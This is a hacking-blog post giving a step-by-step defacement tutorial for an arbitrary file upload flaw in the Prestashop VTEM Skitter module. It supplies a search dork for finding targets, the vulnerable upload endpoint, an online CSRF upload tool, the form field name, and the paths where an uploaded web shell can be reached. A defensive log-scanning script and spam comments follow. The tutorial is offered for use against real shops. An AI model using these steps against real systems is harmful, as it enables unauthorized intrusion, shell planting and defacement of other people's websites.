Deface Method Prestashop VTEM Skitter Arbitrary File Upload - Noob Exploded

Blogging , Defacing , Pentesting , News Hacking

Tuesday, 28 March 2017

Deface Method Prestashop VTEM Skitter Arbitrary File Upload

This time I want to post a deface tutorial for the Prestashop VTEM Skitter Arbitrary File Upload. This tutorial is probably still fresh :V, so let's get straight into it :V



Dork: inurl:modules/vtemskitter/ (the dork can be extended with your own imagination)

Exploit : /modules/vtemskitter/uploadimage.php

The online CSRF tool we use comes from Aweu404. Thanks, Aweu404.

https://www.my.aweu404.id/aw.php

Postname, fill in with: userfile

Shell access: site.co.li/modules/vtemskitter/img/urfile
or site.co.li/modules/vtemskitter/slides/urfile

Steps:

1. Dork, searching in Images only.
2. Pick one of the images.
3. Enter the exploit path above, like: site.co.li/[path]/modules/vtemskitter/uploadimage.php
4. Vulnerable? There is an error message in the corner.
5. Enter the vulnerable site into the CSRF tool and set Postname to userfile. When done, click Oke.
6. Upload your shell; when done, click jos.
7. To access the file, see above.


That's all for now. This post was put together just the way it is :V

Having Deface All defacer ^_^

Signed: Fix404
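For site owners running this module, the requests described above leave a recognisable trail in the web server access log. The following is an added example, not part of the original post: it flags requests to the upload endpoint and fetches of non-image files from the two upload directories, and lists clients that did both in sequence. The Combined Log Format, the extension lists and the sample log lines are assumptions constructed for illustration.

```python
import re
from posixpath import splitext
from urllib.parse import unquote, urlsplit

# The endpoint and directories come from the post; the rest is assumed.
UPLOAD_ENDPOINT = "/modules/vtemskitter/uploadimage.php"
UPLOAD_DIRS = ("/modules/vtemskitter/img/", "/modules/vtemskitter/slides/")
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".webp"}  # assumed allow-list
SCRIPT_MARKERS = (".php", ".phtml", ".phar")             # assumed script markers
# Combined Log Format prefix: ip ident user [time] "METHOD target PROTO" status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+)[^"]*" (\d{3}) ')

def classify(line):
    """Return (ip, kind, path, status) for a suspicious request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, method, target, status = m.groups()
    # Decode %-escapes and drop the query string before matching paths.
    path = unquote(urlsplit(target).path).lower()
    if path.endswith(UPLOAD_ENDPOINT):
        kind = "upload-post" if method == "POST" else "endpoint-probe"
        return (ip, kind, path, int(status))
    for d in UPLOAD_DIRS:
        _, sep, name = path.partition(d)
        # Flag non-image extensions and double extensions such as x.php.jpg.
        if sep and name and (splitext(name)[1] not in IMAGE_EXTS
                             or any(s in name for s in SCRIPT_MARKERS)):
            return (ip, "non-image-fetch", path, int(status))
    return None

def scan(lines):
    """Return all findings plus IPs whose upload POST succeeded before a non-image fetch."""
    findings = [f for f in map(classify, lines) if f]
    uploaded, chained = set(), []
    for ip, kind, _, status in findings:
        if kind == "upload-post" and 200 <= status < 300:
            uploaded.add(ip)
        elif kind == "non-image-fetch" and ip in uploaded and ip not in chained:
            chained.append(ip)
    return findings, chained

# Constructed sample log lines (documentation IP ranges, made-up file names).
SAMPLE = [
    '203.0.113.7 - - [28/Mar/2017:10:00:01 +0000] "GET /shop/modules/vtemskitter/slides/banner1.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [28/Mar/2017:10:02:10 +0000] "GET /shop/modules/vtemskitter/uploadimage.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [28/Mar/2017:10:02:31 +0000] "POST /shop/modules/vtemskitter/uploadimage.php HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [28/Mar/2017:10:02:40 +0000] "GET /shop/modules/vtemskitter/img/sample.php?x=1 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '192.0.2.50 - - [28/Mar/2017:10:05:00 +0000] "GET /shop/modules/vtemskitter/slides/pic.PhP.jpg HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]
```

Any IP returned in the second value of `scan()` warrants checking the two directories on disk for files that are not slider images.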


2 comments:

  1. Excellent script, I also put it on my site, greatly facilitated the work with files. Also I recommend to use ready-made optimized templates prestashop https://www.templatemonster.com/ru/prestashop-themes-type/, created for specific topics. For example, I use the prestashop design template and the picture is somewhat similar to such aggregators as 500mpx

  2. I really appreciate this wonderful post that you have provided for us. I assure this would be beneficial for most of the people. logo design
